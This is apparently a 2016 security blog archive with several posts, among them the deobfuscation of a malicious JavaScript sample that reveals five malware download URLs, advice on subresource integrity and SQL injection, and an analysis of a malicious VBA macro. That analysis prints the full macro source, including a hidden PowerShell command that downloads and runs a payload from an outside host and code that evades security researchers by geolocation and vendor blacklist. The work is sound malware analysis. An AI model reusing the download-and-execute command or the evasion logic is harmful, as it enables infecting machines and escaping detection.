Wednesday, August 31, 2016

Deobfuscating some more Javascript

Saw this paste with malicious JavaScript. If you strip out all the malicious variable creations (_zds, se, _dd) and the eval statement at the end, and replace them all with console.log() statements, you get a somewhat clearer picture. Repeat the same routine of replacing the bad stuff with console.log() statements and you finally get this code

and in it there is a freaky-looking variable that ends up containing the URLs of interest.

var IGv7=[MMo+XQb1+Gd5 + VSv+Hb+Cl+Tj4+VKq+Pg + DSx+Pa + GYy+MEw1+Rj + Pf+NZa2 + Fb9+Fb+Ke+JPy+Ow9 + ORq+Sv+FOl7 + Cn, MMo+Ly5+YOv7 + AYc8+Sq6+So+Af1+Nu + Zz+ZKb + Zn1+Ik+Vy4+PRi5+Ho4+Gy9, VBg+DFu + ZDn + Cl0+Vw+Jc + Fs+Jp + Tu6+Vg7+OZv8 + UTt+Po+Cj3 + Gq8+EDt+Ag+LDc + Qn+St0+HNu + Sk6, MMo+Ly5+Qc7 + Vc9+Zn4 + ALt+Ui4 + BYt+Cc5+ZZq9 + Vm0+Ci5, Wq6 + Ya+Li5 + LJz3+Vg+Je1 + Yu8+ZPg+DFe5+HDm+Su1+Xz + XGx];

when printed out

console.log(IGv7);

["http://jago-computerservice.homepage.t-online.de/poxs17b", "http://www.elba-scaglieri.com/vj021d23", "http://sven-jaenecke.homepage.t-online.de/zvs7h", "http://www.arrotin.net/y263j", "http://bookinghotworld.ws/0b8acb"]
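As an added example (not the code from the paste), here is the same "swap eval for console.log" trick done programmatically in Node.js, so each captured stage can be fed straight back in; SAMPLE_STAGE is a constructed stand-in for the obfuscated script with a placeholder URL.

```javascript
// Added example (not the code from the paste): the "swap eval for console.log"
// trick done programmatically, so each captured stage can be fed back in.
// SAMPLE_STAGE is a constructed stand-in for the obfuscated script (placeholder URL).
const SAMPLE_STAGE = [
  "var _zds = 'ht' + 'tp://';",
  "var se = 'example' + '.invalid/';",
  "var _dd = 'pa' + 'ge.js';",
  "eval('var nextStageUrl = \"' + _zds + se + _dd + '\";');",
].join('\n');

// Run one stage with `eval` and `Function` shadowed by a recording function.
// Inside the stage the identifier `eval` resolves to our parameter, so the
// decoded text is captured instead of executed. The stage's other statements
// DO still run, so use this only inside an isolated analysis VM.
function captureStage(stageSource) {
  const captured = [];
  // A regular function, so it also survives being called as `new Function(...)`.
  function capture(code) {
    captured.push(String(code));
    return function () {}; // harmless stand-in for whatever the sample expected back
  }
  const runner = new Function('eval', 'Function', stageSource);
  runner(capture, capture);
  return captured;
}

// Pull URLs out of the captured stages (the "URLs of interest" in the post).
function extractUrls(stages) {
  const urls = new Set();
  for (const text of stages) {
    for (const m of text.matchAll(/https?:\/\/[^\s"'<>)]+/g)) urls.add(m[0]);
  }
  return [...urls];
}
```

When a sample uses other execution sinks (setTimeout with a string, document.write), add them to the shadowed parameter list in the same way.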



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Run this Free Scan on your Website

Mozilla came out with a great free online tool called the Mozilla Observatory which gives you another great way to gauge how securely your developers and sysadmins have set up your website. It's a simple A to F grade scale again, and of course like every other tool it's not perfect, but if you have a dynamically generated site that pulls records from a database, for example, you really want to consider having your team modify your website code to get the score of an A.



It tells you about many great features, mostly HTTP Header related, that you should be doing on your site but may not be. It has the little informational icon which will give you details about how to resolve your issues also.



It also tells you about your SSL configuration (Qualys SSL Labs is also a good tool for this).

Overall it's good to get 3rd party perspectives on the security of your site.


Web Developers Add this to your Script Tags

Troy Hunt wrote a great article on Web Subresource Integrity (SRI). As an example notice this script tag, where you're pulling the jquery library from a CDN so that you don't have to host it yourself, and to gain the browser caching performance benefits since the user probably already has it cached anyways.

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.3/jquery.min.js" integrity="sha384-I6F5OKECLVtK/BL+8iSLDEHowSAfUo76ZL9+kGAgTRdiByINKJaqTPH/QVNS1VDb" crossorigin="anonymous"></script>

Notice the two extra attributes, integrity and crossorigin, that you may not normally be used to adding or seeing. If you're a web developer you really want to consider adding these. Why?

The integrity attribute means that when the browser loads jQuery from CloudFlare it's going to calculate the hash of the file (a base64-encoded SHA-384 hash in this case, per the prefix in the attribute), compare it to the one given on the script tag, and only run the file if it checks out. Thus if the CDN has been hacked, or your browser is somehow getting a man-in-the-middle-modified version of the file, the hashes won't match and the browser won't run it.

The crossorigin attribute is set to anonymous to ensure no credentials or identity info is sent with the request (i.e. basic auth or an auth cookie).

Good simple stuff to add and increase the security on your site.


Prevent SQL Injection in PHP

Good quick read on preventing SQL injection by Kamran Mohsin

1-Input Validation
  e.g. cast input that should be an integer to an integer before using it, so no nasty SQL can ride along.
   $id = intval($_GET['id']);


2-Prepared Statements
  e.g. a better way, since it separates the SQL logic from the data
  $stmt = $dbh->prepare("INSERT INTO REGISTRY (name, value) VALUES (:name, :value)");
  $stmt->bindParam(':name', $name);
  $stmt->bindParam(':value', $value);
  $stmt->execute();


3-Least Privileges
e.g. even if your developer screwed up, limit what the bad guy can do: if the website only reads certain tables, give its database account read access to only those tables.



ipconfig /displaydns

Thought it'd be useful to share how to use the built-in Windows ipconfig /displaydns command for forensics or security research. This gives you a list of all DNS entries cached locally by your workstation, so you can see where you, or the malware you're researching, has been trying to call out to.



And of course by combining commands you can quickly narrow down the results, such as by piping into findstr.




VBA Malware with Security Researcher Detection

I saw this paste titled deobfuscated malware on pastebin a few days ago. Thought it was worth discussing. This is a malicious VBA script (which launches PowerShell) that is going to download and execute a payload on the victim's computer.

.DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

What's interesting or a bit different about this payload than others is that the attacker is trying to perform "Security Researcher Detection". Similar to how some malware performs VMware detection in order to disable itself if it's being run in a virtual machine, this malware disables itself if it's being run from within a security research corporation's IP subnet. How? The attacker is actually pulling your geolocation from maxmind.com

  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False




and the attacker has a blacklist

  Blacklist = Array( 'Return
   "FORTINET", _
...
   "TREND MICRO", _
...
   "FIREEYE", _


and if, for example, the response contained the text FIREEYE (a leading security research company)



then the malware would disable itself.

  If BlacklistHit Then Error 102


So security researchers should be aware of code/attacks like this that may purposefully do nothing depending on how or where you run it from.

Edit: Mistakenly typed Powershell instead of VBA in title. It's VBA that calls powershell.

The code

Dim gContinue As Boolean
Public Sub InkPicture1_Painted(ByVal Param1 As Long, ByVal Param2 As IInkRectangle)
  On Error GoTo x_Error
  If gContinue Then Exit Sub
   gContinue = True
   ExecutePayload
  Exit Sub
  x_Error:
End Sub

Public Sub ExecutePayload()
  If RecentFileCountTooLow Then Error 101
  If BlacklistHit Then Error 102
  Set WScriptShell = CreateObject("WScript.Shell")
  WScriptShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)", 0
  Exit Sub
End Sub

Public Function RecentFileCountTooLow() As Boolean
  RecentFileCountTooLow = RecentFiles.Count < 3
End Function

Dim City As String
Public Function BlacklistHit() As Boolean
  City = UCase(GetCity)
  For Each Value In Blacklist
   If InStr(City, Value) <> 0 Then GoTo InBlacklist
  Next
  Exit Function
  InBlacklist:
   BlacklistHit = True 'Return
End Function

Public Function Blacklist()
  Blacklist = Array( 'Return
   "FORTINET", _
   "CISCO", _
   "TREND MICRO", _
   "RACKSPACE", _
   "HOSTING", _
   "STRONG TECHNOLOGIES", _
   "DATA CENTER", _
   "IRON PORT", _
   "BLUECOAT", _
   "BLUE COAT", _
   "VMVAULT", _
   "MESSAGELABS", _
   "MICROSOFT", _
   "MIMECAST", _
   "LEASEWEB", _
   "BLACKOAKCOMPUTERS", _
   "ESET, SPOL", _
   "SERVER", _
   "DATACENTER", _
   "BITDEFENDER", _
   "DATACENTRE", _
   "OVH SAS", _
   "NFORCE", _
   "TRENDMICRO", _
   "ANONYMOUS", _
   "CLOUD", _
   "AMAZON", _
   "HISPEED.CH", _
   "HOSTED", _
   "IRONPORT", _
   "PALO ALTO", _
   "PROOFPOINT", _
   "SECURITY", _
   "TRUSTWAVE", _
   "FORCEPOINT", _
   "DEDICATED", _
   "HETZNER", _
   "FIREEYE", _
   "ZSCALER"
  )
End Function

Public Function GetCity() As String
  Set xmlHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
  xmlHttp.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
  xmlHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
  xmlHttp.Send
  If xmlHttp.Status <> 200 Then Error 201
   GetCity = xmlHttp.ResponseText 'Return
End Function
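As an added example (not part of the paste or the post), a small Node.js triage helper that pulls the "security researcher detection" indicators out of VBA macro source, so documents carrying this evasion can be flagged; SAMPLE_MACRO is a constructed excerpt mirroring the structure of the code above.

```javascript
// Added example (not part of the paste or the post): extract the evasion
// indicators described above from VBA macro source as structured findings.
// SAMPLE_MACRO is a constructed excerpt mirroring the code in the post.
const SAMPLE_MACRO = `
Public Function RecentFileCountTooLow() As Boolean
  RecentFileCountTooLow = RecentFiles.Count < 3
End Function
Public Function Blacklist()
  Blacklist = Array( 'Return
   "FORTINET", _
   "TREND MICRO", _
   "FIREEYE"
  )
End Function
Public Function GetCity() As String
  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
End Function
`;

// Collect the string literals of `<name> = Array( ... )`, following VBA's `_`
// line continuations. Limitation: a ' inside a string literal is treated as a comment.
function extractVbaArrayStrings(source, name) {
  const m = new RegExp(name + '\\s*=\\s*Array\\(').exec(source);
  if (!m) return [];
  const items = [];
  for (const raw of source.slice(m.index + m[0].length).split(/\r?\n/)) {
    const line = raw.replace(/'.*$/, ''); // drop VBA ' comments (e.g. 'Return)
    for (const s of line.matchAll(/"([^"]*)"/g)) items.push(s[1]);
    if (line.replace(/"[^"]*"/g, '').includes(')')) break; // closing paren of Array(
  }
  return items;
}

// The three tells from the post: a sandbox check on recent files, a geolocation
// lookup of the victim's own IP, and a vendor/hosting word list.
function scanMacro(source) {
  return {
    recentFilesCheck: /RecentFiles\.Count\s*<\s*\d+/.test(source),
    geoipLookup: /maxmind\.com\/geoip/i.test(source),
    vendorBlacklist: extractVbaArrayStrings(source, 'Blacklist'),
  };
}

// Geolocation lookup combined with a vendor word list is the evasion signature.
function isResearcherEvasion(findings) {
  return findings.geoipLookup && findings.vendorBlacklist.length > 0;
}
```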



.xyz and .top domain names

It struck me that in many of the SANS ISC diaries [1] and the Malware Traffic Analysis blog posts [1], many if not the majority of the malware analyzed was reaching out to .xyz or .top domain names. They can apparently be registered for less than $1/yr, which may be a contributing factor to why they're so popular with the bad guys; head over to tld-list.com and sort by "Cheapest Register." It may not be right to block them all, but in the current state of things it seems reasonable to at least alert on, or review, email and/or web traffic to these top-level domains.
